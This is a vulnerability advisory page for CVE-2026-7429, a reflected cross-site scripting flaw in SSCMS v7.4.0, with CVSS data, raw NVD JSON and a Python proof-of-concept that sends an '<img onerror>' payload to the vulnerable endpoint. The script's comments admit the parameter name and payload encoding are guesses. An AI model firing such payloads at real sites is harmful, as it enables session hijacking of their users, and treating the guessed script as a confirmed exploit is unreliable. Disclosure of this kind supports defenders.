Security Vulnerability Report
中文
CVE-2026-7429 CVSS 4.6 MEDIUM

CVE-2026-7429

Published: 2026-04-30 20:16:25
Last Modified: 2026-05-01 15:28:46
Source: [email protected]

Description

SSCMS v7.4.0 contains a reflected cross-site scripting vulnerability in the STL processing endpoint that allows attackers to execute arbitrary JavaScript by crafting malicious STL template payloads that are decrypted and returned without proper sanitization. Attackers can exploit improper output encoding in the /api/stl/actions/dynamic endpoint to inject executable JavaScript into JSON responses, leading to session hijacking, phishing attacks, and unauthorized actions performed on behalf of users.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SSCMS v7.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: SSCMS v7.4.0 Reflected XSS via STL Processing # Date: 2026-04-30 # Vendor: SSCMS # Version: v7.4.0 # CVE: CVE-2026-7429 import requests import urllib.parse def trigger_xss(target_url): """ This script demonstrates the Reflected XSS vulnerability in SSCMS. It sends a malicious payload to the /api/stl/actions/dynamic endpoint. """ # The endpoint vulnerable to XSS endpoint = f"{target_url}/api/stl/actions/dynamic" # Malicious JavaScript payload # In a real scenario, this might be encoded/encrypted depending on how the STL payload is processed xss_payload = '<img src=x onerror=alert(1)>' # Construct the request (Assuming parameter name based on dynamic endpoint behavior) params = { "template": xss_payload } try: response = requests.get(endpoint, params=params, timeout=10) print(f"[+] Request sent to: {endpoint}") print(f"[+] Status Code: {response.status_code}") # Check if the payload is reflected unescaped in the response if xss_payload in response.text: print("[+] Vulnerability Confirmed! Payload was reflected without sanitization.") print(f"[+] Response Snippet: {response.text[:200]}...") else: print("[-] Payload not found in response or sanitized.") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost:5000" trigger_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7429", "sourceIdentifier": "[email protected]", "published": "2026-04-30T20:16:24.997", "lastModified": "2026-05-01T15:28:46.093", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SSCMS v7.4.0 contains a reflected cross-site scripting vulnerability in the STL processing endpoint that allows attackers to execute arbitrary JavaScript by crafting malicious STL template payloads that are decrypted and returned without proper sanitization. Attackers can exploit improper output encoding in the /api/stl/actions/dynamic endpoint to inject executable JavaScript into JSON responses, leading to session hijacking, phishing attacks, and unauthorized actions performed on behalf of users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/siteserver/cms", "source": "[email protected]"}, {"url": "https://github.com/siteserver/cms/issues/3892", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sscms-reflected-cross-site-scripting-via-stl-processing", "source": "[email protected]"}, {"url": "https://github.com/siteserver/cms/issues/3892", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.